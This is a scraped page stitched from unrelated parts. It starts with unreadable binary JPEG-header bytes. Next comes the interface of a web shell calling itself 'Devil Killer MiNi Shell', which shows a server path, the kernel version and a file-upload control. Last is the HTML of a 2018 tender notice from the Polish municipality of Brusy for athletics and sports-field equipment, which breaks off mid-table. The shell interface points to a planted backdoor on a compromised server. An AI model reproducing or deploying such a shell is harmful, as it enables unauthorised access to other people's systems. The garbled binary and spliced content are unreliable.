JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180801/597723-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 597723-N-2018 z dnia 2018-08-01 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Brusy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Brusy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">9235125100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Na Zaborach</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">89632 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Brusy</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">523 969 302</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zp@brusy.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">523 969 303</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">brusy.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">bip.brusy.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.brusy.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferta wraz z załącznikami musi zostać złożona w zaklejonej, nieprzezroczystej kopercie w siedzibie Zamawiającego </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy, Biuro interesanta, pok. Nr 1</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">Nr ZP.271.29.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest dostawa sprzętu dla wyposażenia kompleksu boisk sportowych w Brusach:Część I: zadanie pn. ,,Modernizacja boiska treningowego kompleksu sportowego przy ul. Armii Krajowej w Brusach wraz z zagospodarowaniem terenu oraz zakupem niezbędnego sprzętu" dofinansowane w ramach Pilotażowego programu modernizacji infrastruktury sportowej - Mały Klub 2017Część II: zadanie pn. ,,Zagospodarowanie terenu stadionu w Brusach na cele sportowe w zakresie bieżni i urządzeń lekkoatletycznych z utwardzeniem terenu, boisk piłki siatkowej plażowej 2 szt., piłki nożnej na dz. 512/24, 512/25 i 512/52 w m. Brusy" dofinansowane ze środków Funduszu Rozwoju Kultury Fizycznej zadania inwestycyjnego w ramach Programu Rozwoju Infrastruktury Lekkoatletycznej.2.	Zamawiający zleca Wykonawcy, a Wykonawca zobowiązuje się:1)	sprzedać oraz dostarczyć i zamontować (jeśli sposób użytkowania wymaga montażu):Część I:Lp.	Rodzaj sprzętu	Ilośćszt. / kpl	Wymagania i opis1. Blok startowy	6	Certyfikat IAAF, konstrukcja z aluminium lub ze stali cynkowanej galwanicznie, zakres pochylenia oparć (5 poz.) i wzajemnego ich położenia (15 poz.).2. Płotek	65	Certyfikat IAAF, minimum sześć wysokości, w tym m.in. 680, 762, 838, zatrzaskowy systemem regulacji wysokości i zatrzaskowy system regulacji siły przewrotu płotka, plastikowa listwa.3. Pałeczki sztafetowe	10	Certyfikat IAAF, wyczynowe, śr 40 mm, wykonane z rury aluminiowej, różne kolory4. Pachołek	20	wysokość min. 20 cm, kolor czerwony5. Pachołek	8	wysokość nie wyższa niż 15 cm, kolor czerwony 6. Chorągiewka sędziowska	10	biała, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej. 7. Chorągiewka sędziowska	10	czerwona, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej.8. Chorągiewka sędziowska	10	żółta, wykonana z wodoodpornej tkaniny syntetycznej, osadzona na rurce aluminiowej.9. Chorągiewka zielona na drzewcu 4	chorągiewka zielona na drzewcu z podstawą, do zaznaczania linii zejścia na 800 m i 4 x 400 m10. Stojak do skoku wzwyż	2	certyfikat IAAF, wyczynowy, aluminiowy, teleskopowy, zasięg od 115 cm do 265 cm, konstrukcja odporna na warunki atmosferyczne 11. Zeskok do skoku wzwyż	1	certyfikat IAAF, wymiary 5 x 3 x 0,75 m, wyczynowy, odporny na wilgoć.12. Pokrowiec na zeskok	1	Wykonany z nieprzemakalnego winylu, klamerki stalowe do łączenia z zeskokiem.13. Stelaż stalowy pod zeskok	1	Modułowa stalowa konstrukcja, wysokość 8-12 cm z wózkiem w zestawie14. Poprzeczka do skoku wzwyż	5	Certyfikat IAAF, wyczynowa15. Przymiar do skoku wzwyż	1	Pomiar do 3 m teleskopowy, aluminiowy16. Zestaw znaczników rozbiegu	5 kpl 6 znaczników w komplecie, wbijanych, metalowych, w sześciu kontrastowych kolorach, malowane proszkowo17. Listwa długości skoku	1	konstrukcja aluminiowa, na białym tle czarne cyfry ze skalą, po jednej stronie od 4,5 m do 8,5 m; po drugiej od 13,5 m do 17,5 m18. Niwelator do piachu	2	trwała stalowa konstrukcja, łopatki zagarniające po obu stronach profilu, uchwyty z rękojeścią zapewniającą duży komfort pracy, regulowane prowadnice niwelatora dostosowujące produkt do szerokości zeskoczni19. Szpilka do zaznaczania śladu	4	długość 0,7-1 m, stalowa, z przeznaczeniem do skoku w dal (2 szt.) oraz do pchnięcia kulą i rzutu oszczepem (po 1 szt.)20. Taśma miernicza	2	stalowa, zwijana, długość 10 metrów 21. Taśma miernicza	2	stalowa, zwijana, długość 20 metrów 22. Taśma miernicza	1	stalowa, zwijana, długość 100 metrów23. Taśma	1	taśma do wyznaczania sektora rzutów, w odcinkach o łącznej długości 400m, wraz z klamerkami do mocowania24. Kula	2	certyfikat IAAF, wyczynowa stalowa 7,26 kg, średnica 128 mm, malowana lakierem proszkowym.25. Kula	1	certyfikat IAAF, wyczynowa stalowa 7,26 kg, średnica 120 mm, malowana lakierem proszkowym.26. Kula	2	certyfikat IAAF, wyczynowa, stalowa 6 kg, średnica 125 mm, malowana lakierem proszkowym.27. Kula	1	certyfikat IAAF, wyczynowa, stalowa 6 kg, średnica. 115 mm, malowana lakierem proszkowym.28. Kula	2	certyfikat IAAF, wyczynowa, stalowa 5 kg, średnica. 120 mm, malowana lakierem proszkowym.29. Kula	1	certyfikat IAAF, wyczynowa, stalowa 5 kg, średnica. 110 mm, malowana lakierem proszkowym.30. Kula	2	certyfikat IAAF, wyczynowa, stalowa 4 kg, średnica. 110 mm malowana lakierem proszkowym.31. Kula	1	certyfikat IAAF, wyczynowa stalowa 4 kg, średnica. 95 mm, malowana lakierem proszkowym.32. Kula	2	certyfikat IAAF, wyczynowa, stalowa 3 kg, średnica. 110 mm, malowana lakierem proszkowym.33. Kula	1	certyfikat IAAF, wyczynowa stalowa, 3 kg, średnica. 95 mm, malowana lakierem proszkowym.34. Znacznik do zaznaczania śladu po rzucie	2kpl	w każdym komplecie po 10 szt. znaczników, wbijane, stalowe, lakierowane proszkowo35. Chorągiewka metalowa na szpilce	2	------------------------------------------------------------------36. Stojak uniwersalny (do kul i oszczepów)	1	stojak uniwersalny, na którym mieszczą się kule (minimum 12 sztuk) i oszczepy (minimum 12 sztuk) malowany lakierem proszkowym, przejezdny37. Oszczep	5	Certyfikat IAAF, waga 800 g, wyczynowy, różne sztywności.38. Oszczep	5	Certyfikat IAAF, waga 700 g, wyczynowy różne sztywności.39. Oszczep	5	Certyfikat IAAF, waga 600 g, wyczynowy, różne sztywności.40. Oszczep	5	Certyfikat IAAF, waga 500 g, wyczynowy, różne sztywności.41. Chorągiewki	4	stalowe, do oznaczenia końca sektora rzutów, czerwone z podstawą.42. Zestaw znaczników odległości do rzutu oszczepem	1kpl	wbijane, do konkurencji rzutowych, w komplecie 14 szt., wykonane ze stali malowanej proszkowo na biało, granatowe lub czarne cyfry, do rzutu oszczepem od 30 do 90m co 10m.43. Znaczniki do zaznaczania długości rzutu kulą	1kpl	wbijane, do konkurencji rzutowych, w komplecie 14 szt., wykonane ze stali malowanej proszkowo na biało, granatowe lub czarne cyfry, do pchnięcia kulą z cyframi od 10 do 22m co 2 metry.44. Podium dla zwycięzców	1	na konstrukcji stalowej, składane45. Pistolet startowy	1	do pistoletu należy dołączyć komplet nabojów (50 szt.)46. Klaps startowy	1	wykonany z drewna, wyposażony w wygodne uchwyty47. Stoper	8	stoper elektroniczny z pamięcią 10 wyników, maksymalny pomiar czasu: do 10 godzin, z dokładnością do 1/100 sekundy48. Chronometr z drukarką	1	chronometr z drukarką pozwalający na rejestrowanie i wydruk poszczególnych czasów, w skład zestawu wchodzi m.in.: torba transportowa, chronometr, oprogramowanie, 2 rolki papieru termicznego, zasilacz sieciowy, komplet baterii, kable sygnałowe START-STOP, pistolet startowy kompatybilny z chronometrem49. Wiatromierz elektroniczny	1	wiatromierz elektroniczny - ultradźwiękowy, na statywie, temperatura pracy: od -35oC do +70oC,50. Skrzynki z numerami torów	1 kpl	w zestawie komplet 6 skrzynek z numerami 1-6 z możliwością sygnalizacji falstartu51. Tablica informacyjna do informowania na mecie o liczbie okrążeni	1	dwucyfrowa, z dzwonkiem do sygnalizacji ostatniego okrążenia, wolnostojąca, wykonana ze spienionego PCV, rama tablicy wykonana z kształtowników stalowych52. Tablica prędkości wiatru	1	konstrukcja stalowa malowana proszkowo, złożona z elementów umożliwiających szybki montaż, kasety cyfrowe z tworzywa sztucznego53. Krzesło	12	krzesło turystyczne z oparciem, składane54. Słupek 5x5cm	12	słupek do ustawienia na liniach torów na przecięciu z linią zejścia55. Garaż najazdowy na zeskok	1	garaż metalowy na zeskok do skoku wzwyż do samodzielnego montażu56. Tablica informacyjna do podawania wyników	5	minimum dwurzędowa, minimum 9-cyfrowa, konstrukcja stalowa malowana proszkowo, kasety numeryczne z tworzywa sztucznego57. Rękaw lotniskowy	4	rękaw lotniskowy na drzewcu do wskazywania kierunku wiatru, wysokość 1,2m58. Belka do odbicia przy skoku w dal i trójskoku(W)	8	wyczynowa, każda belka powinna zawierać: listwę z plasteliną, listwę bez plasteliny (zaślepka), belkę nośną z łatwowymienialną belką odbicia, rury drenażowe i kratki odpływowe, skrobak do formowania plasteliny, plastelinę zapasową ok. 0,3kg59. Pokrywa zabezpieczająca do ramy belki	8	pokrywa do zabezpieczenia belki do skoku w dal/trójskoku60. Znaczniki oznaczające położenie belki	2kpl	komplet zawiera 2 znaczniki odbicia w formie daszku, wykonane z blachy aluminiowej, malowane proszkowo, w białym kolorze z granatowym pasem61. Szczotka kortowa	1	szczotka szerokości 2,0m, średni stopień twardości, aluminiowa rączka, uchwyt trapezowyCzęść II:Lp.	Rodzaj sprzętu	Ilośćszt. / kpl	Wymagania i opis1. Bramka piłkarska	2	bramka piłkarska o konstrukcji aluminiowej, kolor biały, przenośna, wymiary 5x2m, wyposażona w siatkę i obciążniki (3 szt.) 2. Kosiarka wrzecionowa	1	kosiarka wrzecionowa, samobieżna, minimalna szerokość cięcia 800mm, silnik benzynowy o mocy min. 6,5 KM, regulowana wysokość koszenia do 56mm, możliwość wymiany wrzeciona na inne kasety takie jak: wertykulator, aerator, skaryfikator, szczotka, które powinny być w zestawie, kosiarka wyposażona również w kosz do zbierania trawy oraz fotelik dla operatora3. Zegar elektroniczny zewnętrzny	1	zegar elektroniczny dwustronny o min. wym. 1700x600x40 mm, sterowany sygnałem GPS, z pomiarem temperatury, wyświetlanie naprzemienne: czasu, daty i temperatury, format wyświetlania: GG:MM (bez sekundnika), zasilanie 230V, zegar należy zamontować na elewacji budynku socjalno-sportowego w miejscu wskazanym przez Zamawiającego, podłączyć i uruchomić4. Stojak na rowery	1kpl	komplet stojaków na 60 miejsc postojowych, preferowane 12 stojaków po 5 miejsc postojowych w każdym stojaku, konstrukcja stalowa, minimalne rozmiary: długość 150cm, szerokość 40cm, wysokość 25cm2)	przeszkolić pracowników wskazanych przez Zamawiającego w zakresie obsługi dostarczonych urządzeń.3.	Wszystkie urządzenia i sprzęt mają być fabrycznie nowe i posiadać wymagane certyfikaty CE oraz niezbędne dokumenty wymagane przepisy umożliwiające bezpieczną pracę i obsługę.4.	Sprzęt sportowy lekkoatletyczny musi spełniać wymagania PZLA.5.	Sprzęt pomiarowy musi posiadać legalizację Głównego Urzędu Miar.6.	Wykonawca wykona i przygotuje oraz złoży w formie trwale spiętej wszelkie dokumenty dotyczące wykonanego przedmiotu zamówienia, a zwłaszcza:1)	instrukcje (w języku polskim) użytkowania zamontowanych urządzeń,2)	dokumenty gwarancyjne wraz z warunkami gwarancji wszystkich dostarczonych urządzeń,3)	dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu zamówienia,4)	inne dokumenty zgromadzone w trakcie realizacji zamówienia, a odnoszące się do jego realizacji,5)	właściwe oznaczenie i zabezpieczenie miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku,7.	Wykonawca zobowiązany jest do właściwego oznaczenia i zabezpieczenia miejsc prowadzenia montażu, zapewnienie należytego ładu i porządku oraz prowadzenia prac montażowych zgodnie z wymogami BHP i p.poż., a także przepisami dotyczącymi ochrony środowiska.8.	Wykonawca zobowiązany jest do ponoszenia odpowiedzialności (w tym finansowej) za szkody powstałe na terenie realizacji przedmiotu zamówienia pozostające w związku przyczynowym z pracami prowadzonymi przez Wykonawcę.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">37400000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD 